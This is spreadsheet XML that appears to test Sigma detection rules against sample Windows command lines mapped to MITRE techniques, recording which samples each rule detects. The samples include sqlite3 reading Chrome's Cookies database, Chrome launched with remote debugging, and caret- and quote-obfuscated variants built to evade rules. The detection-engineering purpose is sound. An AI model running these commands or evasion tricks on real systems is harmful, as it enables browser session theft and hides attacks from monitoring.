      <c r="E223" s="4" t="inlineStr">
        <is>
          <t>"C:\Program Files\Google\Chrome\Application\chrome.exe" "--remote-debugging-address"=127.0.0.1 "--remote-debugging-port"=9222</t>
        </is>
      </c>
      <c r="F223" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G223" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H223" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I223" s="43" t="n"/>
      <c r="J223" s="43" t="n"/>
      <c r="K223" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="224" ht="15.75" customHeight="1" s="42">
      <c r="A224" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B224" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C224" s="4" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D224" s="4" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E224" s="4" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-de^bugging-address=127.0.0.1 --remote-de^bugging-port=9222</t>
        </is>
      </c>
      <c r="F224" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G224" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H224" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I224" s="43" t="n"/>
      <c r="J224" s="43" t="n"/>
      <c r="K224" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="225" ht="15.75" customHeight="1" s="42">
      <c r="A225" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B225" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C225" s="4" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D225" s="4" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E225" s="4" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\User Data\Default\Network\"Cookies</t>
        </is>
      </c>
      <c r="F225" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G225" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H225" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I225" s="43" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access (24c77512-782b-448a-8950-eddb0785fc71)</t>
        </is>
      </c>
      <c r="J225" s="43" t="n"/>
      <c r="K225" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="226" ht="15.75" customHeight="1" s="42">
      <c r="A226" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B226" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C226" s="4" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D226" s="4" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E226" s="4" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\USERDA~1\Default\Network\Cookies"</t>
        </is>
      </c>
      <c r="F226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G226" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H226" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I226" s="43" t="inlineStr">
        <is>
          <t>Use Short Name Path in Command Line (349d891d-fef0-4fe4-bc53-eee623a15969); Use Short Name Path in Command Line (349d891d-fef0-4fe4-bc53-eee623a15969)</t>
        </is>
      </c>
      <c r="J226" s="43" t="n"/>
      <c r="K226" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="227" ht="15.75" customHeight="1" s="42">
      <c r="A227" s="43" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B227" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C227" s="4" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D227" s="4" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E227" s="4" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\User Data"\Default\Network\Cookies</t>
        </is>
      </c>
      <c r="F227" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G227" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H227" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I227" s="43" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access (24c77512-782b-448a-8950-eddb0785fc71)</t>
        </is>
      </c>
      <c r="J227" s="43" t="n"/>
      <c r="K227" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="228" ht="15.75" customHeight="1" s="42">
      <c r="A228" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B228" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_compression</t>
        </is>
      </c>
      <c r="C228" s="4" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE</t>
        </is>
      </c>
      <c r="D228" s="4" t="inlineStr">
        <is>
          <t>418a3163-3247-4b7b-9933-dcfcb7c52ea9</t>
        </is>
      </c>
      <c r="E228" s="4" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\tar.exe" --create -f C:\Temp\test.tar C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H228" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I228" s="43" t="n"/>
      <c r="J228" s="43" t="n"/>
      <c r="K228" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="229" ht="15.75" customHeight="1" s="42">
      <c r="A229" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B229" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_compression</t>
        </is>
      </c>
      <c r="C229" s="4" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE</t>
        </is>
      </c>
      <c r="D229" s="4" t="inlineStr">
        <is>
          <t>418a3163-3247-4b7b-9933-dcfcb7c52ea9</t>
        </is>
      </c>
      <c r="E229" s="4" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\tar.exe" cf C:\Temp\test.tar C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F229" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G229" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H229" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I229" s="43" t="n"/>
      <c r="J229" s="43" t="n"/>
      <c r="K229" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="230" ht="15.75" customHeight="1" s="42">
      <c r="A230" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B230" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_compression</t>
        </is>
      </c>
      <c r="C230" s="4" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE</t>
        </is>
      </c>
      <c r="D230" s="4" t="inlineStr">
        <is>
          <t>418a3163-3247-4b7b-9933-dcfcb7c52ea9</t>
        </is>
      </c>
      <c r="E230" s="4" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\System32\tar.exe" -^cf C:\Temp\test.tar C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F230" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G230" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H230" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I230" s="43" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE (418a3163-3247-4b7b-9933-dcfcb7c52ea9)</t>
        </is>
      </c>
      <c r="J230" s="43" t="n"/>
      <c r="K230" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="231" ht="15.75" customHeight="1" s="42">
      <c r="A231" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B231" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C231" s="4" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D231" s="4" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E231" s="4" t="inlineStr">
        <is>
          <t>tar.exe --extract -vf C:\Temp\test.tar -C C:\Temp</t>
        </is>
      </c>
      <c r="F231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G231" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H231" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I231" s="43" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE (418a3163-3247-4b7b-9933-dcfcb7c52ea9)</t>
        </is>
      </c>
      <c r="J231" s="43" t="n"/>
      <c r="K231" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="232" ht="15.75" customHeight="1" s="42">
      <c r="A232" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B232" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C232" s="4" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D232" s="4" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E232" s="4" t="inlineStr">
        <is>
          <t>tar.exe xvf C:\Temp\test.tar -C C:\Temp</t>
        </is>
      </c>
      <c r="F232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G232" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H232" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I232" s="43" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE (418a3163-3247-4b7b-9933-dcfcb7c52ea9)</t>
        </is>
      </c>
      <c r="J232" s="43" t="n"/>
      <c r="K232" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="233" ht="15.75" customHeight="1" s="42">
      <c r="A233" s="43" t="inlineStr">
        <is>
          <t>t1560</t>
        </is>
      </c>
      <c r="B233" s="4" t="inlineStr">
        <is>
          <t>proc_creation_win_tar_extraction</t>
        </is>
      </c>
      <c r="C233" s="4" t="inlineStr">
        <is>
          <t>Compressed File Extraction Via Tar.EXE</t>
        </is>
      </c>
      <c r="D233" s="4" t="inlineStr">
        <is>
          <t>bf361876-6620-407a-812f-bfe11e51e924</t>
        </is>
      </c>
      <c r="E233" s="4" t="inlineStr">
        <is>
          <t>cmd.exe /c tar.exe -^xvf C:\Temp\test.tar -C C:\Temp</t>
        </is>
      </c>
      <c r="F233" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G233" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H233" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I233" s="43" t="inlineStr">
        <is>
          <t>Compressed File Creation Via Tar.EXE (418a3163-3247-4b7b-9933-dcfcb7c52ea9); Compressed File Extraction Via Tar.EXE (bf361876-6620-407a-812f-bfe11e51e924)</t>
        </is>
      </c>
      <c r="J233" s="43" t="n"/>
      <c r="K233" s="43" t="b">
        <v>0</v>
      </c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954"/>
  <dataValidations count="3">
    <dataValidation sqref="J2:J262" showDropDown="1" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="custom">
      <formula1>AND(ISNUMBER(J2),(NOT(OR(NOT(ISERROR(DATEVALUE(J2))), AND(ISNUMBER(J2), LEFT(CELL("format", J2))="D")))))</formula1>
    </dataValidation>
    <dataValidation sqref="F2:H262" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"FALSE,TRUE"</formula1>
    </dataValidation>
    <dataValidation sqref="A2:A262" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"t1021.002,t1039,t1048,t1059.001,t1074.001,t1113,t1114,t1115,t1123,t1185,t1005,t1056.002,t1560.001,t1539,t1119,t1552.001,t1564.003,t1560,t1563.002"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2" min="1" max="1"/>
    <col width="68.56999999999999" customWidth="1" style="42" min="2" max="2"/>
    <col width="43" customWidth="1" style="42" min="3" max="3"/>
    <col width="38" customWidth="1" style="42" min="4" max="4"/>
    <col width="194.14" customWidth="1" style="42" min="5" max="5"/>
    <col width="18.43" customWidth="1" style="42" min="6" max="6"/>
    <col width="21.71" customWidth="1" style="42" min="7" max="7"/>
    <col width="18.57" customWidth="1" style="42" min="8" max="8"/>
    <col width="43" customWidth="1" style="42" min="9" max="9"/>
    <col width="18" customWidth="1" style="42" min="10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6" t="inlineStr">
        <is>
          <t>t1593.003</t>
        </is>
      </c>
      <c r="B2" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_git_susp_clone</t>
        </is>
      </c>
      <c r="C2" s="6" t="inlineStr">
        <is>
          <t>Suspicious Git Clone</t>
        </is>
      </c>
      <c r="D2" s="6" t="inlineStr">
        <is>
          <t>aef9d1f1-7396-4e92-a927-4567c7a495c1</t>
        </is>
      </c>
      <c r="E2" s="6" t="inlineStr">
        <is>
          <t>git clone https://github.com/user/CVE-2023-4567.git C:/temp/research</t>
        </is>
      </c>
      <c r="F2" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G2" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H2" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I2" s="4" t="n"/>
      <c r="J2" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K2" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3" ht="22.5" customHeight="1" s="42">
      <c r="A3" s="6" t="inlineStr">
        <is>
          <t>t1593.003</t>
        </is>
      </c>
      <c r="B3" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_git_susp_clone</t>
        </is>
      </c>
      <c r="C3" s="6" t="inlineStr">
        <is>
          <t>Suspicious Git Clone</t>
        </is>
      </c>
      <c r="D3" s="6" t="inlineStr">
        <is>
          <t>aef9d1f1-7396-4e92-a927-4567c7a495c1</t>
        </is>
      </c>
      <c r="E3" s="6" t="inlineStr">
        <is>
          <t>git clone https://github.com/user/CVE-2023-4567.git C:\temp\research\CVE-2023-4567\</t>
        </is>
      </c>
      <c r="F3" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G3" s="6" t="b">
        <v>1</v>
      </c>
      <c r="H3" s="6" t="b">
        <v>1</v>
      </c>
      <c r="I3" s="4" t="n"/>
      <c r="J3" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K3" s="6" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" s="42">
      <c r="A4" s="6" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B4" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_aadinternals_cmdlets_execution</t>
        </is>
      </c>
      <c r="C4" s="6" t="inlineStr">
        <is>
          <t>AADInternals PowerShell Cmdlets Execution - ProccessCreation</t>
        </is>
      </c>
      <c r="D4" s="6" t="inlineStr">
        <is>
          <t>c86500e9-a645-4680-98d7-f882c70c1ea3</t>
        </is>
      </c>
      <c r="E4" s="6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F4" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G4" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="4" t="n"/>
      <c r="J4" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K4" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="22.5" customHeight="1" s="42">
      <c r="A5" s="6" t="inlineStr">
        <is>
          <t>execution</t>
        </is>
      </c>
      <c r="B5" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_aadinternals_cmdlets_execution</t>
        </is>
      </c>
      <c r="C5" s="6" t="inlineStr">
        <is>
          <t>AADInternals PowerShell Cmdlets Execution - ProccessCreation</t>
        </is>
      </c>
      <c r="D5" s="6" t="inlineStr">
        <is>
          <t>c86500e9-a645-4680-98d7-f882c70c1ea3</t>
        </is>
      </c>
      <c r="E5" s="6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F5" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G5" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H5" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I5" s="4" t="n"/>
      <c r="J5" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K5" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6" ht="22.5" customHeight="1" s="42">
      <c r="A6" s="6" t="inlineStr">
        <is>
          <t>t1593.003</t>
        </is>
      </c>
      <c r="B6" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_git_susp_clone</t>
        </is>
      </c>
      <c r="C6" s="6" t="inlineStr">
        <is>
          <t>Suspicious Git Clone</t>
        </is>
      </c>
      <c r="D6" s="6" t="inlineStr">
        <is>
          <t>aef9d1f1-7396-4e92-a927-4567c7a495c1</t>
        </is>
      </c>
      <c r="E6" s="6" t="inlineStr">
        <is>
          <t>git clone https://github.com/user/CVE-2023-4567.git C:\temp\research\CVE-2023-4567</t>
        </is>
      </c>
      <c r="F6" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G6" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H6" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I6" s="4" t="n"/>
      <c r="J6" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K6" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="7" ht="22.5" customHeight="1" s="42">
      <c r="A7" s="6" t="inlineStr">
        <is>
          <t>t1595</t>
        </is>
      </c>
      <c r="B7" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_pingcastle_script_parent</t>
        </is>
      </c>
      <c r="C7" s="6" t="inlineStr">
        <is>
          <t>PUA - PingCastle Execution From Potentially Suspicious Parent</t>
        </is>
      </c>
      <c r="D7" s="6" t="inlineStr">
        <is>
          <t>b37998de-a70b-4f33-b219-ec36bf433dc0</t>
        </is>
      </c>
      <c r="E7" s="6" t="inlineStr">
        <is>
          <t>C:\\Program Files\\PingCastle\\PingCastle.exe --healthcheck --server dc01\\.internal</t>
        </is>
      </c>
      <c r="F7" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G7" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I7" s="4" t="n"/>
      <c r="J7" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K7" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="8" ht="22.5" customHeight="1" s="42">
      <c r="A8" s="6" t="inlineStr">
        <is>
          <t>t1595</t>
        </is>
      </c>
      <c r="B8" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_pingcastle_script_parent</t>
        </is>
      </c>
      <c r="C8" s="6" t="inlineStr">
        <is>
          <t>PUA - PingCastle Execution From Potentially Suspicious Parent</t>
        </is>
      </c>
      <c r="D8" s="6" t="inlineStr">
        <is>
          <t>b37998de-a70b-4f33-b219-ec36bf433dc0</t>
        </is>
      </c>
      <c r="E8" s="6" t="inlineStr">
        <is>
          <t>copy "PingCastle.exe" "Taskmgr.exe" /Y &amp;&amp; "Taskmgr.exe" --healthcheck --level Full</t>
        </is>
      </c>
      <c r="F8" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G8" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I8" s="4" t="n"/>
      <c r="J8" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K8" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="9" ht="22.5" customHeight="1" s="42">
      <c r="A9" s="6" t="inlineStr">
        <is>
          <t>t1595</t>
        </is>
      </c>
      <c r="B9" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_pingcastle_script_parent</t>
        </is>
      </c>
      <c r="C9" s="6" t="inlineStr">
        <is>
          <t>PUA - PingCastle Execution From Potentially Suspicious Parent</t>
        </is>
      </c>
      <c r="D9" s="6" t="inlineStr">
        <is>
          <t>b37998de-a70b-4f33-b219-ec36bf433dc0</t>
        </is>
      </c>
      <c r="E9" s="6" t="inlineStr">
        <is>
          <t>C:\\Program Files\\PingCastle\\PingCastle.exe --healthcheck --level Full --server dc01.internal</t>
        </is>
      </c>
      <c r="F9" s="6" t="b">
        <v>0</v>
      </c>
      <c r="G9" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H9" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I9" s="4" t="n"/>
      <c r="J9" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K9" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="10" ht="22.5" customHeight="1" s="42">
      <c r="A10" s="6" t="inlineStr">
        <is>
          <t>t1593.003</t>
        </is>
      </c>
      <c r="B10" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_git_susp_clone</t>
        </is>
      </c>
      <c r="C10" s="6" t="inlineStr">
        <is>
          <t>Suspicious Git Clone</t>
        </is>
      </c>
      <c r="D10" s="6" t="inlineStr">
        <is>
          <t>aef9d1f1-7396-4e92-a927-4567c7a495c1</t>
        </is>
      </c>
      <c r="E10" s="6" t="inlineStr">
        <is>
          <t>git clone https://github.com/user/CVE-2023-4567.git C:\temp\research</t>
        </is>
      </c>
      <c r="F10" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G10" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H10" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I10" s="6" t="inlineStr">
        <is>
          <t>Suspicious Git Clone (aef9d1f1-7396-4e92-a927-4567c7a495c1)</t>
        </is>
      </c>
      <c r="J10" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K10" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="11" ht="22.5" customHeight="1" s="42">
      <c r="A11" s="6" t="inlineStr">
        <is>
          <t>t1593.003</t>
        </is>
      </c>
      <c r="B11" s="6" t="inlineStr">
        <is>
          <t>proc_creation_win_git_susp_clone</t>
        </is>
      </c>
      <c r="C11" s="6" t="inlineStr">
        <is>
          <t>Suspicious Git Clone</t>
        </is>
      </c>
      <c r="D11" s="6" t="inlineStr">
        <is>
          <t>aef9d1f1-7396-4e92-a927-4567c7a495c1</t>
        </is>
      </c>
      <c r="E11" s="6" t="inlineStr">
        <is>
          <t>git clone https://github.com/user/CVE-2023-4567.git C:\temp\research\</t>
        </is>
      </c>
      <c r="F11" s="6" t="b">
        <v>1</v>
      </c>
      <c r="G11" s="6" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="6" t="b">
        <v>0</v>
      </c>
      <c r="I11" s="6" t="inlineStr">
        <is>
          <t>Suspicious Git Clone (aef9d1f1-7396-4e92-a927-4567c7a495c1); Suspicious Git Clone (aef9d1f1-7396-4e92-a927-4567c7a495c1); Suspicious Git Clone (aef9d1f1-7396-4e92-a927-4567c7a495c1)</t>
        </is>
      </c>
      <c r="J11" s="6" t="n">
        <v>3</v>
      </c>
      <c r="K11" s="6" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="22.5" customHeight="1" s="42">
      <c r="A12" s="41" t="n"/>
      <c r="B12" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_active_directory_module_dll_import</t>
        </is>
      </c>
      <c r="C12" s="41" t="inlineStr">
        <is>
          <t>Potential Active Directory Enumeration Using AD Module - ProcCreation</t>
        </is>
      </c>
      <c r="D12" s="41" t="inlineStr">
        <is>
          <t>70bc5215-526f-4477-963c-a47a5c9ebd12</t>
        </is>
      </c>
      <c r="E12" s="41" t="n"/>
      <c r="F12" s="41" t="n"/>
      <c r="G12" s="41" t="n"/>
      <c r="H12" s="41" t="n"/>
      <c r="I12" s="41" t="n"/>
      <c r="J12" s="41" t="n"/>
      <c r="K12" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="22.5" customHeight="1" s="42">
      <c r="A13" s="41" t="inlineStr">
        <is>
          <t>t1593.003</t>
        </is>
      </c>
      <c r="B13" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_git_susp_clone</t>
        </is>
      </c>
      <c r="C13" s="41" t="inlineStr">
        <is>
          <t>Suspicious Git Clone</t>
        </is>
      </c>
      <c r="D13" s="41" t="inlineStr">
        <is>
          <t>aef9d1f1-7396-4e92-a927-4567c7a495c1</t>
        </is>
      </c>
      <c r="E13" s="41" t="inlineStr">
        <is>
          <t>git.exe	clone	https://example.com/repositories/Vulns-Check</t>
        </is>
      </c>
      <c r="F13" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G13" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H13" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I13" s="41" t="n"/>
      <c r="J13" s="41" t="n"/>
      <c r="K13" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="14" ht="22.5" customHeight="1" s="42">
      <c r="A14" s="41" t="inlineStr">
        <is>
          <t>t1593.003</t>
        </is>
      </c>
      <c r="B14" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_git_susp_clone</t>
        </is>
      </c>
      <c r="C14" s="41" t="inlineStr">
        <is>
          <t>Suspicious Git Clone</t>
        </is>
      </c>
      <c r="D14" s="41" t="inlineStr">
        <is>
          <t>aef9d1f1-7396-4e92-a927-4567c7a495c1</t>
        </is>
      </c>
      <c r="E14" s="41" t="inlineStr">
        <is>
          <t>git.exe "clone" https://example.com/repositories/Vulns-Check</t>
        </is>
      </c>
      <c r="F14" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G14" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H14" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I14" s="41" t="n"/>
      <c r="J14" s="41" t="n"/>
      <c r="K14" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="41" t="inlineStr">
        <is>
          <t>t1593.003</t>
        </is>
      </c>
      <c r="B15" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_git_susp_clone</t>
        </is>
      </c>
      <c r="C15" s="41" t="inlineStr">
        <is>
          <t>Suspicious Git Clone</t>
        </is>
      </c>
      <c r="D15" s="41" t="inlineStr">
        <is>
          <t>aef9d1f1-7396-4e92-a927-4567c7a495c1</t>
        </is>
      </c>
      <c r="E15" s="41" t="inlineStr">
        <is>
          <t>git.exe clone https://example.com/repositories/%56ulns-Check</t>
        </is>
      </c>
      <c r="F15" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G15" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H15" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I15" s="41" t="n"/>
      <c r="J15" s="41" t="n"/>
      <c r="K15" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="16" s="42">
      <c r="A16" s="41" t="inlineStr">
        <is>
          <t>t1593.003</t>
        </is>
      </c>
      <c r="B16" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_git_susp_clone</t>
        </is>
      </c>
      <c r="C16" s="41" t="inlineStr">
        <is>
          <t>Suspicious Git Clone</t>
        </is>
      </c>
      <c r="D16" s="41" t="inlineStr">
        <is>
          <t>aef9d1f1-7396-4e92-a927-4567c7a495c1</t>
        </is>
      </c>
      <c r="E16" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c git.exe clo^ne https://example.com/repositories/Vulns-Check</t>
        </is>
      </c>
      <c r="F16" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G16" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H16" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I16" s="41" t="inlineStr">
        <is>
          <t>Suspicious Git Clone (aef9d1f1-7396-4e92-a927-4567c7a495c1); Suspicious Git Clone (aef9d1f1-7396-4e92-a927-4567c7a495c1)</t>
        </is>
      </c>
      <c r="J16" s="41" t="n"/>
      <c r="K16" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="17" s="42">
      <c r="A17" s="41" t="inlineStr">
        <is>
          <t>t1593.003</t>
        </is>
      </c>
      <c r="B17" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_git_susp_clone</t>
        </is>
      </c>
      <c r="C17" s="41" t="inlineStr">
        <is>
          <t>Suspicious Git Clone</t>
        </is>
      </c>
      <c r="D17" s="41" t="inlineStr">
        <is>
          <t>aef9d1f1-7396-4e92-a927-4567c7a495c1</t>
        </is>
      </c>
      <c r="E17" s="41" t="inlineStr">
        <is>
          <t>git.exe clone https://example.com/repositories/V""ulns-Check</t>
        </is>
      </c>
      <c r="F17" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G17" s="41" t="b">
        <v>0</v>
      </c>
